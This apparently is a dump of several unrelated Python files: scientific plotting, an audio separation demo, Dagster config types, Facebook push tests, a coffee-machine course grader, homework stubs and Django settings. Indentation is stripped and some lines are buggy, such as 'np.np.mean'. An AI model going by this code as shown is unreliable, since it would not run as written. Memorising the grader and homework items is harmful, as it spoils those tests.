[f"static, t = 0, $\phi = ${phi_benchmark}%", ""] + [f"dynamic, {vax_policy}, $\phi = ${phi}%" for phi in phis],
title = "allocation", title_fontsize = "24", fontsize = "20")
plt.xticks(fontsize = "20")
plt.yticks(fontsize = "20")
plt.PlotDevice().ylabel("WTP (USD)\n").xlabel("\nnumber vaccinated")
plt.ylim(0, 350)
plt.xlim(left = 0, right = N_TN)
plt.show()
if __name__ == "__main__":
src = mkdir(data/f"wtp_metrics{num_sims}")
evaluated_deaths = load_metrics(src/"evaluated_deaths.npz")
evaluated_YLL = load_metrics(src/"evaluated_YLL.npz")
evaluated_WTP = load_metrics(src/"evaluated_WTP.npz")
evaluated_VSLY = load_metrics(src/"evaluated_VSLY.npz")
evaluated_WTP_h = load_metrics(src/"evaluated_WTP_h.npz")
evaluated_WTP_i = load_metrics(src/"evaluated_WTP_i.npz")
evaluated_WTP_p = load_metrics(src/"evaluated_WTP_p.npz")
evaluated_WTP_pc = load_metrics(src/"evaluated_WTP_pc.npz")
district_WTP = load_metrics(src/"district_WTP.npz")
district_YLL = load_metrics(src/"district_YLL.npz")
death_percentiles = {tag: np.percentile(metric, [50, 5, 95]) for (tag, metric) in evaluated_deaths.items()}
YLL_percentiles = {tag: np.percentile(metric, [50, 5, 95]) for (tag, metric) in evaluated_YLL.items()}
VSLY_percentiles = {tag: np.percentile(metric[0].sum(axis = 1), [50, 5, 95], axis = 0) for (tag, metric) in evaluated_VSLY.items()}
WTP_percentiles = {tag: np.percentile(metric[0].sum(axis = 1), [50, 5, 95], axis = 0) for (tag, metric) in evaluated_WTP.items()}
# policy outcomes
# outcomes_per_policy(death_percentiles, "deaths", "o")
# plt.show()
# outcomes_per_policy(YLL_percentiles, "YLLs", "o")
# plt.show()
# outcomes_per_policy(WTP_percentiles, "WTP (USD, billions)", "D")
# plt.show()
# outcomes_per_policy(VSLY_percentiles, "VSLY (USD, billions)", "D")
# # plt.gca().ticklabel_format(useOffset = False, style='plain')
# plt.show()
# # aggregate WTP by age
# fig = plt.figure()
# for (i, (md, lo, hi)) in enumerate(zip(*np.percentile(np.sum([v[0] for v in district_WTP.values()], axis = 0), [50, 5, 95], axis = 0))):
# *_, bars = plt.errorbar(x = [i], y = [md * USD], yerr = [[md * USD - lo * USD], [hi * USD - md * USD]], figure = fig,
# fmt = "D", color = age_group_colors[i], ms = 12, elinewidth = 5, label = age_bin_labels[i])
# [_.set_alpha(0.5) for _ in bars]
# plt.xticks([0, 1, 2, 3, 4, 5, 6], age_bin_labels, fontsize = "20")
# plt.yticks(fontsize = "20")
# plt.legend(title = "age bin", title_fontsize = "20", fontsize = "20")
# plt.PlotDevice().ylabel("aggregate WTP (USD)\n")
# plt.show()
# # health/consumption
summed_wtp_health = np.median(evaluated_WTP_h[50, "random"], axis = 0)
summed_wtp_income = np.median(evaluated_WTP_pc[50, "random"] - evaluated_WTP_h[50, "random"], axis = 0)
# summed_wtp_income = np.median(evaluated_WTP_i[50, "random"], axis = 0)
# plot_component_breakdowns(summed_wtp_health, summed_wtp_income, "health", "consumption", semilogy = True)
# plt.show()
# # social/private
summed_wtp_priv = np.median(evaluated_WTP_p[50, "random"], axis = 0)
summed_wtp_soc = np.median(evaluated_WTP_pc[50, "random"] - evaluated_WTP_p[50, "random"], axis = 0)
# plot_component_breakdowns(summed_wtp_soc, summed_wtp_priv, "social", "private", semilogy = False)
# plt.show()
# # dist x age
per_district_WTP_percentiles = {(district, *parse_tag(tag)): np.percentile(wtp[0, :, :], [50, 5, 95], axis = 0) for ((district, tag), wtp) in district_WTP.items()}
per_district_YLL_percentiles = {(district, *parse_tag(tag)): np.percentile(yll , [50, 5, 95], axis = 0) for ((district, tag), yll) in district_YLL.items()}
# plot_district_age_distribution(per_district_WTP_percentiles, "per capita WTP (USD)", "D", N_jk = N_jk_dicts)
# plt.show()
# plot_district_age_distribution(per_district_YLL_percentiles, "YLL" , "o")
# plt.show()
# demand curves
ranking_provider = get_wtp_ranking(district_WTP)
demand_curves(ranking_provider, "mortality")
plt.show()
demand_curves(ranking_provider, "random")
plt.show()
demand_curves(ranking_provider, "contact")
plt.show()
|
<filename>demos/kam_harmonic_SS.py
# in this script a mixture of harmonic sources will be analyzed for separation uisng KAM
# along with harmonic kernels
import matplotlib.pyplot as plt
plt.interactive('True')
import numpy as np
from nussl.separation.KAM import AudioSignal,kam
import time
# close all figure windows
plt.close('all')
# load the audio mixture and generate spectrograms
FileName='/Users/fpishdadian/SourceSeparation/Audio Samples/Input/piano_mix2.wav'
mix=AudioSignal(FileName)
WinL=2*2048 # 93 ms window
Ovp=3*WinL/4 # 50% overlap
mix.windowlength=WinL
mix.overlap_samples=Ovp
mix.num_fft_bins=WinL
mix.makeplot=1
mix.fmaxplot=5000
plt.figure(1)
mix.do_STFT()
plt.title('Mixture')
# inputs of the 'kam' function
Inputfile=[FileName,'full length',0]
# define harmonic kernels with different fundamental freq.s
Np=1
SourceKernels=[]
SourceKernels.append(['harmonic',np.mat([24,Np])]) # source #1
SourceKernels.append(['harmonic',np.mat([32,Np])]) # source #2
SourceKernels.append(['harmonic',np.mat([36,Np])]) # source #3
SourceKernels.append(['harmonic',np.mat([40,Np])]) # source #4
# define smooth harmonic kernels with differnt fundamental freq.s
#SourceKernels=[]
#P=np.array([24,32,36,40])
#NP=1
#Df=NP*P+1
#def ismember(A, B):
# return np.sum(np.array([ i == B.T for i in A.T ]),axis=1).T
#for i in range(0,4):
# Nhood=lambda TFcoords1,TFcoords2: np.logical_and(np.logical_and((np.tile(TFcoords1[:,1],(1,TFcoords2.shape[0]))==np.tile(TFcoords2[:,1].T,(TFcoords1.shape[0],1))),\
# (np.abs(np.tile(TFcoords1[:,0],(1,TFcoords2.shape[0]))-np.tile(TFcoords2[:,0].T,(TFcoords1.shape[0],1)))<Df[i])),\
# (ismember(np.mod(np.tile(TFcoords1[:,0],(1,TFcoords2.shape[0]))-np.tile(TFcoords2[:,0].T,(TFcoords1.shape[0],1)),P[i]),np.mat([0,1,P[i]-1]))))
# SourceKernels.append(['userdef',Nhood])
SpecParams=np.zeros(1,dtype=[('windowlength',int),('overlap_samples',int),('num_fft_bins',int)])
SpecParams['windowlength']=WinL
SpecParams['overlap_samples']=Ovp
SpecParams['num_fft_bins']=WinL
Numit=3
# call the kam function and record the running time
start_time = time.clock()
shat,fhat=kam(Inputfile,SourceKernels,Numit=Numit,SpecParams=SpecParams,FullKernel=False)[0:2]
print time.clock() - start_time, "seconds"
# write the separated sources to .wav files
Ns=len(SourceKernels)
OutPath='/Users/fpishdadian/SourceSeparation/Audio Samples/Output/'
for i in range(0,Ns):
ssi=AudioSignal(audiosig=shat[:,:,i],fs=mix.fs)
ssi.writeaudiofile(OutPath+'kamHout'+str(i+1)+'.wav')
# plot the separated time-domain signals and corresponding power spectral dencities
ts=np.mat(np.arange(shat.shape[0])/float(mix.fs))
Fvec=mix.freq_vec
Tvec=mix.time_vec[0:fhat.shape[1]]
TT=np.tile(Tvec,(len(Fvec),1))
FF=np.tile(Fvec.T,(len(Tvec),1)).T
plt.figure(2)
for i in range(0,Ns):
plt.subplot(Ns,1,i+1)
#plt.plot(ts.T,src1.x[0:shat.shape[0]])
plt.plot(ts.T,shat[:,0,i])
plt.ylabel(r'$\hat{s}_'+str(i+1)+'(t)$')
plt.axis('tight')
plt.xlabel('t(s)')
plt.figure(3)
for i in range(0,Ns):
plt.subplot(Ns,1,i+1)
plt.pcolormesh(TT,FF,np.log10(fhat[:,:,i]))
plt.ylabel('f(Hz)')
plt.title(r'$\hat{f}_'+str(i+1)+' $')
plt.axis('tight')
#plt.ylim(src1.freq_vec[0],5000)
plt.xlabel('t(s)')
|
<filename>python_modules/dagster/dagster/core/types/config.py
from collections import namedtuple
import six
from dagster import check
from .builtin_enum import BuiltinEnum
class ConfigTypeAttributes(namedtuple('_ConfigTypeAttributes', 'is_builtin is_system_config')):
def __new__(cls, is_builtin=False, is_system_config=False):
return super(ConfigTypeAttributes, cls).__new__(
cls,
is_builtin=check.bool_param(is_builtin, 'is_builtin'),
is_system_config=check.bool_param(is_system_config, 'is_system_config'),
)
DEFAULT_TYPE_ATTRIBUTES = ConfigTypeAttributes()
class ConfigType(object):
'''
The class backing DagsterTypes as they are used processing configuration data.
'''
def __init__(self, key, name, type_attributes=DEFAULT_TYPE_ATTRIBUTES, description=None):
type_obj = type(self)
if type_obj in ConfigType.__cache:
check.failed(
(
'{type_obj} already in cache. You **must** use the inst() class method '
'to construct ConfigTypes and not the ctor'.format(type_obj=type_obj)
)
)
self.key = check.str_param(key, 'key')
self.name = check.opt_str_param(name, 'name')
self.description = check.opt_str_param(description, 'description')
self.type_attributes = check.inst_param(
type_attributes, 'type_attributes', ConfigTypeAttributes
)
__cache = {}
@classmethod
def inst(cls):
if cls not in ConfigType.__cache:
ConfigType.__cache[cls] = cls() # pylint: disable=E1120
return ConfigType.__cache[cls]
@staticmethod
def from_builtin_enum(builtin_enum):
check.invariant(BuiltinEnum.contains(builtin_enum), 'param must be member of BuiltinEnum')
return _CONFIG_MAP[builtin_enum]
@property
def is_system_config(self):
return self.type_attributes.is_system_config
@property
def is_builtin(self):
return self.type_attributes.is_builtin
@property
def has_fields(self):
return self.is_composite or self.is_selector
@property
def is_scalar(self):
return False
@property
def is_list(self):
return False
@property
def is_nullable(self):
return False
@property
def is_composite(self):
return False
@property
def is_selector(self):
return False
@property
def is_any(self):
return False
@property
def inner_types(self):
return []
@property
def is_enum(self):
return False
# Scalars, Composites, Selectors, Lists, Optional, Any
class ConfigScalar(ConfigType):
@property
def is_scalar(self):
return True
def is_config_scalar_valid(self, _config_value):
check.not_implemented('must implement')
class ConfigList(ConfigType):
def __init__(self, inner_type, *args, **kwargs):
self.inner_type = check.inst_param(inner_type, 'inner_type', ConfigType)
super(ConfigList, self).__init__(*args, **kwargs)
def is_list(self):
return True
@property
def inner_types(self):
return [self.inner_type] + self.inner_type.inner_types
class ConfigNullable(ConfigType):
def __init__(self, inner_type, *args, **kwargs):
self.inner_type = check.inst_param(inner_type, 'inner_type', ConfigType)
super(ConfigNullable, self).__init__(*args, **kwargs)
@property
def is_nullable(self):
return True
@property
def inner_types(self):
return [self.inner_type] + self.inner_type.inner_types
class ConfigAny(ConfigType):
@property
def is_any(self):
return True
class BuiltinConfigScalar(ConfigScalar):
def __init__(self, description=None):
super(BuiltinConfigScalar, self).__init__(
key=type(self).__name__,
name=type(self).__name__,
description=description,
type_attributes=ConfigTypeAttributes(is_builtin=True),
)
class Int(BuiltinConfigScalar):
def __init__(self):
super(Int, self).__init__(description='')
def is_config_scalar_valid(self, config_value):
return not isinstance(config_value, bool) and isinstance(config_value, six.integer_types)
class _StringishBuiltin(BuiltinConfigScalar):
def is_config_scalar_valid(self, config_value):
return isinstance(config_value, six.string_types)
class String(_StringishBuiltin):
def __init__(self):
super(String, self).__init__(description='')
class Path(_StringishBuiltin):
def __init__(self):
super(Path, self).__init__(description='')
class Bool(BuiltinConfigScalar):
def __init__(self):
super(Bool, self).__init__(description='')
def is_config_scalar_valid(self, config_value):
return isinstance(config_value, bool)
class Float(BuiltinConfigScalar):
def __init__(self):
super(Float, self).__init__(description='')
def is_config_scalar_valid(self, config_value):
return isinstance(config_value, float)
class Any(ConfigAny):
def __init__(self):
super(Any, self).__init__(
key='Any', name='Any', type_attributes=ConfigTypeAttributes(is_builtin=True)
)
def Nullable(inner_type):
check.inst_param(inner_type, 'inner_type', ConfigType)
class _Nullable(ConfigNullable):
def __init__(self):
super(_Nullable, self).__init__(
key='Optional.{inner_type}'.format(inner_type=inner_type.key),
name=None,
type_attributes=ConfigTypeAttributes(is_builtin=True),
inner_type=inner_type,
)
return _Nullable
def List(inner_type):
check.inst_param(inner_type, 'inner_type', ConfigType)
class _List(ConfigList):
def __init__(self):
# Avoiding a very nasty circular dependency which would require us to restructure the
# entire module
from .type_printer import print_config_type_to_string
super(_List, self).__init__(
key='List.{inner_type}'.format(inner_type=inner_type.key),
name=None,
type_attributes=ConfigTypeAttributes(is_builtin=True),
inner_type=inner_type,
)
self.description = 'List of {inner_type}'.format(
inner_type=print_config_type_to_string(self, with_lines=False)
)
return _List
class EnumValue:
def __init__(self, config_value, python_value=None, description=None):
self.config_value = check.str_param(config_value, 'config_value')
self.python_value = config_value if python_value is None else python_value
self.description = check.opt_str_param(description, 'description')
class ConfigEnum(ConfigType):
def __init__(self, name, enum_values):
check.str_param(name, 'name')
super(ConfigEnum, self).__init__(key=name, name=name)
self.enum_values = check.list_param(enum_values, 'enum_values', of_type=EnumValue)
self._valid_python_values = {ev.python_value for ev in enum_values}
check.invariant(len(self._valid_python_values) == len(enum_values))
self._valid_config_values = {ev.config_value for ev in enum_values}
check.invariant(len(self._valid_config_values) == len(enum_values))
@property
def config_values(self):
return [ev.config_value for ev in self.enum_values]
@property
def is_enum(self):
return True
def is_valid_config_enum_value(self, config_value):
return config_value in self._valid_config_values
def to_python_value(self, config_value):
for ev in self.enum_values:
if ev.config_value == config_value:
return ev.python_value
check.failed('should never reach this. config_value should be pre-validated')
def Enum(name, enum_values):
class _EnumType(ConfigEnum):
def __init__(self):
super(_EnumType, self).__init__(name=name, enum_values=enum_values)
return _EnumType
_CONFIG_MAP = {
BuiltinEnum.ANY: Any.inst(),
BuiltinEnum.BOOL: Bool.inst(),
BuiltinEnum.FLOAT: Float.inst(),
BuiltinEnum.INT: Int.inst(),
BuiltinEnum.PATH: Path.inst(),
BuiltinEnum.STRING: String.inst(),
}
ALL_CONFIG_BUILTINS = set(_CONFIG_MAP.values())
|
# coding: utf-8
from zeit.cms.workflow.interfaces import IPublish, IPublishInfo
from zeit.cms.testcontenttype.testcontenttype import ExampleContentType
import fb
import os
import time
import unittest
import zeit.push.facebook
import zeit.push.interfaces
import zeit.push.testing
import zope.component
class FacebookTest(zeit.push.testing.TestCase):
level = 2
def setUp(self):
# Page access token for
# <https://www.facebook.com/pages/Vivi-Test/721128357931123>,
# created on 2014-07-16, expires in about 60 days, recreate with
# ./work/maintenancejobs/bin/facebook-access-token
self.access_token = os.environ['ZEIT_PUSH_FACEBOOK_ACCESS_TOKEN']
self.api = fb.graph.api(self.access_token)
# repr keeps all digits while str would cut them.
self.nugget = repr(time.time())
# Only relevant for the skipped test
# def tearDown(self):
# for status in self.api.get_object(
# cat='single', id='me', fields=['feed'])['feed']['data']:
# if 'message' in status and self.nugget in status['message']:
# self.api.delete(id=status['id'])
@unittest.skip('Facebook says the content was reported as abusive')
def test_send_posts_status(self):
facebook = zeit.push.facebook.Connection()
facebook.send(
u'zeit.push.tests.faceboök %s' % self.nugget, 'http://example.com',
account='fb-test')
for status in self.api.get_object(
cat='single', id='me', fields=['feed'])['feed']['data']:
if self.nugget in status['message']:
self.assertStartsWith('http://example.com/', status['link'])
self.assertIn(u'faceboök', status['message'])
break
else:
self.fail('Status was not posted')
def test_errors_should_raise(self):
facebook = zeit.push.facebook.Connection()
with self.assertRaises(zeit.push.interfaces.TechnicalError) as e:
facebook.send('foo', '', account='fb_ressort_deutschland')
self.assertIn('Invalid OAuth access token.', str(e.exception))
class FacebookAccountsTest(zeit.push.testing.TestCase):
def test_main_account_is_excluded_from_source(self):
self.assertEqual(
['fb-magazin', 'fb-campus'],
list(zeit.push.interfaces.facebookAccountSource(None)))
class FacebookMessageTest(zeit.push.testing.TestCase):
def test_uses_facebook_override_text(self):
content = ExampleContentType()
self.repository['foo'] = content
push = zeit.push.interfaces.IPushMessages(content)
push.message_config = [{
'type': 'facebook', 'enabled': True, 'account': 'fb-test',
'override_text': 'facebook'}]
message = zope.component.getAdapter(
content, zeit.push.interfaces.IMessage, name='facebook')
# XXX This API is a bit unwieldy
# (see zeit.push.workflow.PushMessages._create_message)
message.config = push.message_config[0]
self.assertEqual('facebook', message.text)
def test_adds_campaign_parameters_to_url(self):
content = self.repository['testcontent']
message = zope.component.getAdapter(
content, zeit.push.interfaces.IMessage, name='facebook')
self.assertIn('wt_zmc=sm.int.zonaudev.facebook', message.url)
def test_breaking_flag_is_removed_from_service_after_send(self):
content = ExampleContentType()
self.repository['foo'] = content
push = zeit.push.interfaces.IPushMessages(content)
push.message_config = ({
'type': 'facebook', 'enabled': True, 'breaking_news': True,
'override_text': 'facebook'},)
IPublishInfo(content).urgent = True
IPublish(content).publish()
self.assertEqual(
({'type': 'facebook', 'enabled': False, 'breaking_news': False,
'override_text': 'facebook'},),
push.message_config)
|
from hstest.stage_test import *
from hstest.test_case import TestCase
CheckResult.correct = lambda: CheckResult(True, '')
CheckResult.wrong = lambda feedback: CheckResult(False, feedback)
test1_input = '''remaining
buy
2
buy
2
fill
1000
0
0
0
buy
2
take
remaining
exit
'''
test2_input = '''remaining
fill
3000
3000
3000
3000
remaining
exit
'''
test3_input = '''remaining
buy
1
remaining
exit
'''
test4_input = '''remaining
buy
2
remaining
exit
'''
test5_input = '''remaining
buy
3
remaining
exit
'''
test6_input = '''remaining
take
remaining
exit
'''
test7_input = '''remaining
buy
back
remaining
exit
'''
class CoffeeMachineTest(StageTest):
def generate(self) -> List[TestCase]:
return TestCase.from_stepik(
[
(
test1_input,
(
700 - 400,
390 - 540,
80 - 120,
7 - 9,
0 - 550,
"This test is exactly like in the example "
"- try to run it by yourself"
)
),
(
test2_input,
(
3000,
3000,
3000,
3000,
0,
"This test checks \"fill\" action"
)
),
(
test3_input,
(
-250,
0,
-16,
-1,
4,
"This test checks \"buy\" " +
"action with the first variant of coffee"
)
),
(
test4_input,
(
-350,
-75,
-20,
-1,
7,
"This test checks \"buy\" " +
"action with the second variant of coffee"
)
),
(
test5_input,
(
-200,
-100,
-12,
-1,
6,
"This test checks \"buy\" " +
"action with the third variant of coffee"
)
),
(
test6_input,
(
0,
0,
0,
0,
-550,
"This test checks \"take\" action"
)
),
(
test7_input,
(
0,
0,
0,
0,
0,
"This test checks \"back\" " +
"action right after \"buy\" action"
)
),
]
)
def check(self, reply: str, clue: Any) -> CheckResult:
if len(reply.splitlines()) <= 1:
return CheckResult.wrong('Too few lines in output')
water_, milk_, beans_, cups_, money_, feedback = clue
milk = []
water = []
beans = []
cups = []
money = []
for line in reply.splitlines():
line = line.replace('$', '').strip()
if len(line.split()) == 0:
continue
first_word = line.split()[0]
if not first_word.isdigit():
continue
amount = int(first_word)
if 'milk' in line:
milk += amount,
elif 'water' in line:
water += amount,
elif 'beans' in line:
beans += amount,
elif 'cups' in line:
cups += amount,
elif 'money' in line or 'cash' in line:
money += amount,
if len(milk) != 2:
return CheckResult.wrong(
"There should be two lines with \"milk\", " +
f"found: {len(milk)}"
)
if len(water) != 2:
return CheckResult.wrong(
"There should be two lines with \"water\", " +
f"found: {len(water)}"
)
if len(beans) != 2:
return CheckResult.wrong(
"There should be two lines with \"beans\", " +
f"found: {len(beans)}"
)
if len(cups) != 2:
return CheckResult.wrong(
"There should be two lines with \"cups\", " +
f"found: {len(cups)}"
)
if len(money) != 2:
return CheckResult.wrong(
"There should be two lines with \"money\", " +
f"found: {len(money)}"
)
milk = milk[0], milk[-1]
water = water[0], water[-1]
beans = beans[0], beans[-1]
cups = cups[0], cups[-1]
money = money[0], money[-1]
diff = lambda item: item[1] - item[0]
is_correct = (
diff(water) == water_ and
diff(milk) == milk_ and
diff(beans) == beans_ and
diff(cups) == cups_ and
diff(money) == money_
)
return CheckResult(is_correct, feedback)
if __name__ == '__main__':
CoffeeMachineTest('machine.coffee_machine').run_tests() |
<gh_stars>0
import numpy as np
import sklearn
from sklearn import model_selection
import logistic_regressor as lr
from sklearn import linear_model
import scipy.io
from sklearn.model_selection import KFold
######################################################################################
# The sigmoid function #
# Input: z: can be a scalar, vector or a matrix #
# Output: sigz: sigmoid of scalar, vector or a matrix #
# TODO: 1 line of code expected #
######################################################################################
def sigmoid (z):
sig = np.zeros(z.shape)
# Your code here
# End your code
return sig
######################################################################################
# The log_features transform #
# Input: X: a data matrix #
# Output: a matrix with every element x replaced by log(x+1 ) #
# TODO: 1 line of code expected #
######################################################################################
def log_features(X):
logf = np.zeros(X.shape)
# Your code here
# End your code
return logf
######################################################################################
# The std_features transform #
# Input: X: a data matrix #
# Output: a matrix with every column with zero mean, unit variance #
######################################################################################
def std_features(X):
mu = np.np.mean(X,axis=0)
sigma = np.std(X,axis=0)
X_norm = (X - mu) / sigma
return X_norm, mu, sigma
######################################################################################
# The bin_features transform #
# Input: X: a data matrix #
# Output: a matrix with every element x replaced by 1 if x > 0 else 0 #
# TODO: 1 line of code expected #
######################################################################################
def bin_features(X):
tX = np.zeros(X.shape)
# your code here
# end your code
return tX
######################################################################################
# The select_lambda_crossval function #
# Inputs: X: a data matrix #
# y: a vector of labels #
# lambda_low, lambda_high,lambda_step: range of lambdas to sweep #
# penalty: 'l1' or 'l2' #
# Output: best lambda selected by crossvalidation for input parameters #
######################################################################################
# Select the best lambda for training set (X,y) by sweeping a range of
# lambda values from lambda_low to lambda_high in steps of lambda_step
# pick sklearn's LogisticRegression with the appropriate penalty (and solver)
# about 20 lines of code expected
# For each lambda value, divide the data into 10 equal folds
# using sklearn's model_selection KFold function.
# Then, repeat i = 1:10:
# 1. Retain fold i for testing, and train logistic model on the other 9 folds
# with that lambda
# 2. Evaluate accuracy of model on left out fold i
# Accuracy associated with that lambda is the averaged accuracy over all 10
# folds.
# Do this for each lambda in the range and pick the best one
#
def select_lambda_crossval(X,y,lambda_low,lambda_high,lambda_step,penalty):
best_lambda = lambda_low
# Your code here
# Implement the algorithm above.
# end your code
return best_lambda
######################################################################################
def load_mat(fname):
d = scipy.io.loadmat(fname)
Xtrain = d['Xtrain']
ytrain = d['ytrain']
Xtest = d['Xtest']
ytest = d['ytest']
return Xtrain, ytrain, Xtest, ytest
def load_spam_data():
data = scipy.io.loadmat('spamData.mat')
Xtrain = data['Xtrain']
ytrain1 = data['ytrain']
Xtest = data['Xtest']
ytest1 = data['ytest']
# need to flatten the ytrain and ytest
ytrain = np.array([x[0] for x in ytrain1])
ytest = np.array([x[0] for x in ytest1])
return Xtrain,Xtest,ytrain,ytest
|
<gh_stars>0
# -*- coding: utf-8 -*-
# Django settings for mds_website project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
PROJECT_DIR = os.path.dirname(__file__)
ADMINS = (
# ('<NAME>', '<EMAIL>'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'mdsdb', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': 'postgres',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
#dont force trailing backslash
#APPEND_SLASH = False
#TASTYPIE_ALLOW_MISSING_SLASH = APPEND_SLASH
TASTYPIE_DEFAULT_FORMATS = ['json']
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = os.path.abspath(os.path.join(PROJECT_DIR, "media"))
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = os.path.abspath(os.path.join(PROJECT_DIR, "../sitestatic"))
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.abspath(os.path.join(PROJECT_DIR, "../mds-web-client/dist")),
)
STATICFILES_STORAGE = 'webpack.storage.WebpackHashStorage'
WEBPACK_ASSETS_FILE = os.path.abspath(os.path.join(PROJECT_DIR, "../mds-web-client/webpack-assets.json"))
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'use your own secret key.'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'social.apps.django_app.context_processors.backends',
'social.apps.django_app.context_processors.login_redirect',
)
# google api console: https://console.developers.google.com/project/api-access-tests/apiui/credential?authuser=0
AUTHENTICATION_BACKENDS = (
'social.backends.facebook.FacebookOAuth2',
'social.backends.google.GoogleOAuth2',
'social.backends.twitter.TwitterOAuth',
'social.backends.vk.VKOAuth2',
'django.contrib.auth.backends.ModelBackend',
)
#SOCIAL_AUTH_GOOGLE_OAUTH2_SCOPE = ['https://www.googleapis.com/auth/profile', 'https://www.googleapis.com/auth/email']
LOGIN_REDIRECT_URL = '/'
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'apps.mds_auth.middleware.SocialAuthExceptionHandlerMiddleware'
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
SOCIAL_AUTH_PIPELINE = (
'social.pipeline.social_auth.social_details',
'social.pipeline.social_auth.social_uid',
'social.pipeline.social_auth.auth_allowed',
'social.pipeline.social_auth.social_user',
'social.pipeline.user.get_username',
'social.pipeline.user.create_user',
'apps.mds_auth.auth_pipeline.save_profile', # get profile data from oauth resource
'social.pipeline.social_auth.associate_user',
'social.pipeline.social_auth.load_extra_data',
'social.pipeline.user.user_details',
'apps.mds_auth.auth_pipeline.device_redirect', # change ?next parameter to provide access token for mobile apps
)
ROOT_URLCONF = 'mds_website.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'mds_website.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(PROJECT_DIR, 'templates'),
)
############# CELERY SETTINGS
## Using the database to store task state and results.
CELERY_RESULT_BACKEND = 'amqp'
BROKER_HOST = "localhost"
#BROKER_URL = 'amqp://guest:guest@localhost:5672/celeryvhost'
CELERY_TIMEZONE = TIME_ZONE
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.gis',
'social.apps.django_app.default',
'tastypie',
'apps.muni_scales',
'apps.trails',
'apps.mds_auth',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
'custom': {
'handlers': ['console', 'mail_admins'],
'level': 'DEBUG',
}
}
}
# import local settings file if one exists
# apparantly using system environments is the better solution
try:
from settings_local import *
except Exception, e:
print("Could not find a local settings file.")
|
<filename>scitbx/tests/tst_cubicle_neighbors.py
from __future__ import absolute_import, division, print_function
from six.moves import zip
def exercise_cubicles_max_memory():
import scitbx.cubicle_neighbors as cn
assert cn.cubicles_max_memory_allocation_get() != 0
mm = cn.cubicles_max_memory_allocation_get()
cn.cubicles_max_memory_allocation_set(number_of_bytes=10)
assert cn.cubicles_max_memory_allocation_get() == 10
cn.cubicles_max_memory_allocation_set(number_of_bytes=0)
assert cn.cubicles_max_memory_allocation_get() == 0
cn.cubicles_max_memory_allocation_set(number_of_bytes=mm)
assert cn.cubicles_max_memory_allocation_get() == mm
